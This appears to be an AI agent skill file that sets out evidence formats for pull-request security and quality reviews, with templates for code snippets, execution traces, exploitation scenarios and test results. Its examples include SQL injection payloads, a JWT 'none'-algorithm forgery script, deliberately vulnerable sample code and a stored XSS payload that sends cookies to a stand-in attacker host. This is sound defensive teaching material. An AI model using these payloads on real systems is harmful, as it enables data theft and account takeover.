name	pr-review-evidence-formats
description	Defines what counts as valid evidence in PR reviews including code snippets, execution traces, exploitation scenarios, and test results. Use when validating findings, writing review reports, or verifying claims.
allowed-tools	Read

PR Review Evidence Formats

Purpose: Define what counts as valid, actionable evidence in PR security and quality reviews.

When to Use:

Writing PR review reports
Validating security findings
Documenting breaking changes
Proving logic bugs exist
Checking evidence quality before publishing

Core Principles

1. Show Don't Tell

Bad: "This function has a SQL injection vulnerability" Good: Code snippet + execution trace + exploitation scenario

2. Reproducible Evidence

Evidence must allow reviewer to:

Find the issue (file:line reference)
Understand the issue (code snippet with context)
Verify the issue (execution trace or test)
Assess the impact (exploitation scenario or breaking change demo)

3. Minimal Sufficient Context

Too little: Single line without context
Too much: Entire 200-line function
Just right: 5-10 lines showing issue + surrounding logic

Evidence Types

Type	When Required	Strength	Components
Code Snippet	Always	Weak alone	file:line + 5-10 lines context
Execution Trace	Logic/Security bugs	Medium	Step-by-step flow through code
Exploitation Scenario	Security issues	Strong	Attack vector → exploit → impact
Test Result	Breaking changes	Strong	Before/after test output
Full Proof	Critical findings	Strongest	All four components

Format 1: Code Snippet Standards

Requirements

Must include:

File path with line number
5-10 lines of context (not just problematic line)
Clear indication of problematic code
Brief explanation of issue

Template

## Finding: [Issue Name]

**Severity**: [Critical/High/Medium/Low]

**Location**: `path/to/file.py:123`

**Code**:
```python
# Context before (2-3 lines)
def vulnerable_function(user_input):
    # Clear setup showing data flow
    query = f"SELECT * FROM users WHERE id = {user_input}"  # ← ISSUE: SQL injection
    result = execute_query(query)
    return result
# Context after (1-2 lines)

Issue: User input directly interpolated into SQL query without sanitization.


### Examples

#### ❌ Bad: No Context

```markdown
**Code**: `query = f"SELECT * FROM users WHERE id = {user_input}"`
**Issue**: SQL injection

Why bad: Can't see where user_input comes from, what execute_query does, or how result is used.

✅ Good: Sufficient Context

**Location**: `api/user_handler.py:45`

**Code**:
```python
def get_user_by_id(request):
    user_input = request.GET.get('user_id')  # Untrusted input

    # Direct string interpolation - NO SANITIZATION
    query = f"SELECT * FROM users WHERE id = {user_input}"  # ← SQL INJECTION

    result = execute_query(query)  # Executes unsanitized query
    return jsonify(result)

Issue: user_id from request.GET directly interpolated into SQL query. No validation, escaping, or parameterization.


**Why good**: Shows data source (request.GET), problematic operation (f-string), and execution (execute_query).

---

## Format 2: Execution Trace

### Purpose

Show step-by-step flow through codebase demonstrating how issue manifests.

### Template

```markdown
## Execution Trace: [Issue Name]

**Scenario**: [What triggers this]

**Flow**:
1. **Entry**: `file1.py:10` - [What happens]
   ```python
   [Relevant code snippet]

Step 2: file2.py:45 - [What happens next]
```
[Relevant code snippet]
```
Issue: file3.py:89 - [Where problem occurs]
```
[Problematic code]
```
Impact: [What breaks/leaks/crashes]

Result: [Observable outcome]


### Example: SQL Injection Trace

```markdown
## Execution Trace: SQL Injection in User Search

**Scenario**: User submits search query with malicious payload

**Flow**:
1. **Entry**: `api/routes.py:23` - Request handler receives input
   ```python
   @app.route('/search')
   def search_users():
       query = request.args.get('q')  # User input: "1 OR 1=1--"
       return user_service.search(query)

Pass-through: services/user_service.py:56 - No validation

def search(query):
    # No sanitization or validation
    return database.query_users(query)

Vulnerability: database/queries.py:12 - Direct interpolation

def query_users(search_term):
    sql = f"SELECT * FROM users WHERE name LIKE '%{search_term}%'"  # ← INJECTION
    return db.execute(sql)

Exploitation: Attacker sends ?q=1%' OR '1'='1' --
- Resulting query: SELECT * FROM users WHERE name LIKE '%1' OR '1'='1' --%'
- Returns ALL users (bypasses search filter)

Result: Complete user table dump, authentication bypass potential


### Example: Breaking Change Trace

```markdown
## Execution Trace: Breaking Change in API Response

**Scenario**: Existing client expects `user_id` field

**Flow**:
1. **Before**: `api/v1/users.py:45` (main branch)
   ```python
   def get_user(user_id):
       return {
           "user_id": user_id,  # ← Field exists
           "name": user.name
       }

After: api/v1/users.py:45 (PR branch)

def get_user(user_id):
    return {
        "id": user_id,  # ← Renamed field
        "name": user.name
    }

Client Code: client/user_handler.js:23 (external codebase)

function displayUser(response) {
    const userId = response.user_id;  // ← Expects old field name
    renderUserCard(userId);
}

Breakage: TypeError: Cannot read property 'user_id' of undefined

Result: All API v1 clients break on deployment


### Example: Logic Bug Trace

```markdown
## Execution Trace: Off-by-One Error in Pagination

**Scenario**: User requests page 2 with 10 items per page

**Flow**:
1. **Request**: `GET /api/items?page=2&per_page=10`
   ```python
   # api/routes.py:67
   page = int(request.args.get('page', 1))      # page = 2
   per_page = int(request.args.get('per_page', 10))  # per_page = 10

Offset Calculation: services/pagination.py:34

def calculate_offset(page, per_page):
    # Off-by-one error: should be (page - 1) * per_page
    offset = page * per_page  # ← BUG: 2 * 10 = 20
    return offset

Database Query: database/items.py:89

def get_items(offset, limit):
    # Skips items 11-20, returns items 21-30
    return db.query(f"SELECT * FROM items LIMIT {limit} OFFSET {offset}")

Result:
- Expected: Items 11-20
- Actual: Items 21-30
- Items 11-20 never accessible

Impact: Users can never view items 11-20, pagination broken


---

## Format 3: Exploitation Scenario

### Purpose

Demonstrate realistic attack vector showing how vulnerability is exploited and impact.

### Template

```markdown
## Exploitation Scenario: [Vulnerability Name]

**Attack Vector**: [How attacker accesses vulnerable code]

**Exploit**:

[Actual payload/request/input]


**Execution**:
1. [Step 1 of attack]
2. [Step 2 of attack]
3. [Result/impact]

**Impact**:
- [Security impact 1]
- [Security impact 2]
- [Severity justification]

Example: SQL Injection

## Exploitation Scenario: SQL Injection in User Search

**Attack Vector**: Unauthenticated user submits malicious search query

**Exploit**:
```bash
curl "https://api.example.com/search?q=admin%27%20OR%20%271%27%3D%271%27%20--"

Execution:

Attacker URL-encodes payload: admin' OR '1'='1' --

Server constructs query:

SELECT * FROM users WHERE name LIKE '%admin' OR '1'='1' --%'

Query returns ALL users (OR clause always true)
Response includes admin credentials, emails, password hashes

Response:

{
  "users": [
    {"id": 1, "name": "admin", "email": "admin@example.com", "password_hash": "$2b$12$..."},
    {"id": 2, "name": "user1", "email": "user1@example.com", "password_hash": "$2b$12$..."},
    ... (all 10,000 users)
  ]
}

Impact:

Complete user database dump (PII exposure)
Password hashes exposed (offline cracking possible)
Admin accounts revealed (privilege escalation target)
CVSS 9.1 (Critical): No authentication required, high confidentiality impact


### Example: Authentication Bypass

```markdown
## Exploitation Scenario: JWT Signature Verification Bypass

**Attack Vector**: Any API endpoint requiring authentication

**Exploit**:
```python
import jwt

# Create token with "none" algorithm (no signature)
payload = {"user_id": 1, "role": "admin"}
fake_token = jwt.encode(payload, None, algorithm="none")

# Use in API request
headers = {"Authorization": f"Bearer {fake_token}"}
response = requests.get("https://api.example.com/admin/users", headers=headers)

Execution:

Attacker crafts JWT with "alg": "none" header
Sets arbitrary payload: {"user_id": 1, "role": "admin"}

Server code accepts unsigned token:

# auth/jwt_handler.py:23
decoded = jwt.decode(token, verify=False)  # ← BUG: No signature verification
user_id = decoded['user_id']

Attacker gains admin access without knowing secret key

Impact:

Complete authentication bypass
Privilege escalation to admin
No credentials required
CVSS 9.8 (Critical): Network exploitable, no authentication, complete system compromise


### Example: XSS (Cross-Site Scripting)

```markdown
## Exploitation Scenario: Stored XSS in User Profile

**Attack Vector**: Authenticated user updates profile bio

**Exploit**:
```bash
POST /api/profile
Content-Type: application/json

{
  "bio": "<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>"
}

Execution:

Attacker submits malicious bio with JavaScript payload

Server stores unescaped HTML:

# api/profile.py:45
def update_profile(user_id, bio):
    user.bio = bio  # ← No sanitization
    db.save(user)

Victim views attacker's profile page

Browser renders bio HTML:

<div class="user-bio">
  <script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
</div>

JavaScript executes, sends victim's cookies to attacker

Impact:

Session hijacking (victim's session cookie stolen)
Account takeover (attacker uses stolen cookie)
Persistent (affects all users viewing profile)
CVSS 7.1 (High): Requires authentication, but high impact on other users


---

## Format 4: Test Result Format

### Purpose

Show concrete proof of breaking change or bug through test failures.

### Template

```markdown
## Test Evidence: [Issue Name]

**Test**: [What test demonstrates issue]

**Setup**:
```python
[Test code or setup]

Before PR (main branch):

[Expected output/behavior]

After PR (feature branch):

[Actual output/behavior showing breakage]

Failure Analysis: [What broke and why]


### Example: Breaking Change

```markdown
## Test Evidence: Breaking Change in User API Response

**Test**: Existing integration test for user endpoint

**Setup**:
```python
# tests/test_user_api.py
def test_get_user_returns_expected_fields():
    response = client.get('/api/v1/users/123')
    data = response.json()

    # Clients expect these fields
    assert 'user_id' in data
    assert 'name' in data
    assert 'email' in data

Before PR (main branch):

$ pytest tests/test_user_api.py::test_get_user_returns_expected_fields -v

tests/test_user_api.py::test_get_user_returns_expected_fields PASSED [100%]

Response: {"user_id": 123, "name": "John Doe", "email": "john@example.com"}

After PR (feature branch):

$ pytest tests/test_user_api.py::test_get_user_returns_expected_fields -v

tests/test_user_api.py::test_get_user_returns_expected_fields FAILED [100%]

AssertionError: assert 'user_id' in {'id': 123, 'name': 'John Doe', 'email': 'john@example.com'}

Response: {"id": 123, "name": "John Doe", "email": "john@example.com"}
                ^^^ Field renamed from 'user_id' to 'id'

Failure Analysis: PR renames user_id → id in API response, breaking existing clients expecting user_id field.

Impact: API v1 breaking change requires major version bump and client migration


### Example: Logic Bug

```markdown
## Test Evidence: Pagination Off-by-One Error

**Test**: Pagination returns correct items for page 2

**Setup**:
```python
# tests/test_pagination.py
def test_page_2_returns_items_11_through_20():
    # Setup: Database has items 1-100
    for i in range(1, 101):
        db.create_item(id=i, name=f"Item {i}")

    # Request page 2 (items 11-20)
    response = client.get('/api/items?page=2&per_page=10')
    items = response.json()['items']

    # Verify correct items returned
    assert len(items) == 10
    assert items[0]['id'] == 11  # First item on page 2
    assert items[9]['id'] == 20  # Last item on page 2

Expected Output:

$ pytest tests/test_pagination.py::test_page_2_returns_items_11_through_20 -v

tests/test_pagination.py::test_page_2_returns_items_11_through_20 PASSED [100%]

Items returned: [11, 12, 13, 14, 15, 16, 17, 18, 19, 20]

Actual Output (with bug):

$ pytest tests/test_pagination.py::test_page_2_returns_items_11_through_20 -v

tests/test_pagination.py::test_page_2_returns_items_11_through_20 FAILED [100%]

AssertionError: assert 21 == 11
  Expected first item: 11
  Actual first item: 21

Items returned: [21, 22, 23, 24, 25, 26, 27, 28, 29, 30]
                ^^^ Off by 10 (skipped items 11-20)

Failure Analysis:

Bug location: services/pagination.py:34
Issue: offset = page * per_page should be (page - 1) * per_page
Result: Page 2 skips items 11-20, returns items 21-30


### Example: Coverage Report

```markdown
## Test Coverage Evidence: Critical Function Untested

**Function**: `validate_payment_amount()` in `payment/processor.py:123`

**Coverage Report**:
```bash
$ pytest --cov=payment --cov-report=term-missing

Name                    Stmts   Miss  Cover   Missing
-----------------------------------------------------
payment/processor.py      156     23    85%   123-145, 189-201
                                            ^^^^^^^^^ validate_payment_amount

Uncovered Code:

# payment/processor.py:123-145
def validate_payment_amount(amount, currency):
    # CRITICAL: No test coverage for validation logic
    if amount < 0:
        raise ValueError("Negative amount")  # ← Not tested

    if currency not in SUPPORTED_CURRENCIES:
        raise ValueError("Unsupported currency")  # ← Not tested

    # Currency-specific max amounts
    max_amounts = {"USD": 10000, "EUR": 9000, "GBP": 8000}
    if amount > max_amounts.get(currency, 5000):
        raise ValueError("Amount exceeds limit")  # ← Not tested

    return True

Risk:

Critical payment validation logic untested
Edge cases (negative amounts, invalid currency, exceeding limits) not verified
23% of payment processor uncovered
Recommendation: Add parametrized tests for all validation branches


---

## Evidence Quality Levels

| Level | Components | When Acceptable | Example Use Case |
|-------|-----------|-----------------|------------------|
| **Strong** | Code snippet + execution trace + exploitation/test + impact | Critical/High severity findings | SQL injection, auth bypass, breaking changes |
| **Medium** | Code snippet + execution trace OR test result | Medium severity, clear bugs | Logic errors, data leaks, API inconsistencies |
| **Weak** | Code snippet only with detailed explanation | Low severity, style issues | Code smells, minor inefficiencies, suggestions |
| **Insufficient** | Vague claim without proof | Never acceptable | "This looks vulnerable", "This might break" |

### Quality Assessment Checklist

**For each finding, verify**:
- [ ] File path with line number provided
- [ ] Code snippet has 5-10 lines context (not just problematic line)
- [ ] Issue clearly indicated in code (comment or highlighting)
- [ ] Execution trace shows step-by-step flow (for logic/security bugs)
- [ ] Exploitation scenario demonstrates realistic attack (for security issues)
- [ ] Test result shows before/after comparison (for breaking changes)
- [ ] Impact assessed with severity justification
- [ ] Recommendation provided (how to fix)

---

## Quick Reference Templates

### Security Vulnerability Template

```markdown
## [Vulnerability Type]: [Brief Description]

**Severity**: [Critical/High/Medium/Low] - [CVSS Score if applicable]

**Location**: `path/to/file.py:123`

**Vulnerable Code**:
```python
[5-10 lines with issue marked]

Execution Trace:

Entry: file1.py:10 - [What happens]
Vulnerable point: file2.py:45 - [Issue occurs]
Impact: [Observable result]

Exploitation Scenario:

Attack vector: [How attacker accesses]
Payload: [actual exploit]
Result: [What attacker achieves]

Impact:

[Security impact 1]
[Security impact 2]

Recommendation:

[Fixed code snippet]

References: [OWASP, CWE, CVE links if applicable]


### Breaking Change Template

```markdown
## Breaking Change: [What changed]

**Type**: [API/Database/Behavior] breaking change

**Location**: `path/to/file.py:123`

**Before** (main branch):
```python
[Original code/API]

After (PR branch):

[Changed code/API]

Impact:

Breaks: [What systems/clients affected]
Requires: [Migration steps]

Test Evidence:

[Test failure output]

Recommendation:

Bump major version (v1 → v2)
Document migration guide
Deprecate old API before removal
Add compatibility layer


### Logic Bug Template

```markdown
## Logic Bug: [Brief Description]

**Location**: `path/to/file.py:123`

**Buggy Code**:
```python
[Code showing bug with context]

Execution Trace:

Input: [Example input]
Flow: [Step-by-step through code]
Output: [Incorrect result]

Expected vs Actual:

Expected: [Correct behavior]
Actual: [Buggy behavior]

Test Case:

def test_bug_reproduction():
    result = buggy_function(input)
    assert result == expected  # FAILS

Fix:

[Corrected code]


### Code Quality Issue Template

```markdown
## Code Quality: [Issue Type]

**Location**: `path/to/file.py:123`

**Current Code**:
```python
[Problematic code pattern]

Issue: [What's wrong - complexity, duplication, unclear logic]

Recommendation:

[Improved code]

Benefit: [Why this is better]


---

## Summary

### Valid Evidence Components

1. **File:line reference** - Where to find issue
2. **Code snippet with context** - 5-10 lines showing issue
3. **Execution trace** - Step-by-step flow (for logic/security bugs)
4. **Exploitation scenario** - Realistic attack demonstration (for security)
5. **Test result** - Before/after comparison (for breaking changes)
6. **Impact assessment** - Severity and consequences
7. **Recommendation** - How to fix

### Evidence Quality Standards

**Strong Evidence** = Can reproduce issue without asking clarifying questions

**Weak Evidence** = Vague claims requiring back-and-forth

**No Evidence** = "Looks wrong" without proof

### Golden Rule

**Show the code, trace the execution, prove the impact, provide the fix.**

If you can't demonstrate it with evidence, don't claim it as a finding.

pr-review-evidence-formats

Install Skill

SKILL.md

PR Review Evidence Formats

Core Principles

1. Show Don't Tell

2. Reproducible Evidence

3. Minimal Sufficient Context

Evidence Types

Format 1: Code Snippet Standards

Requirements

Template

✅ Good: Sufficient Context

Example: SQL Injection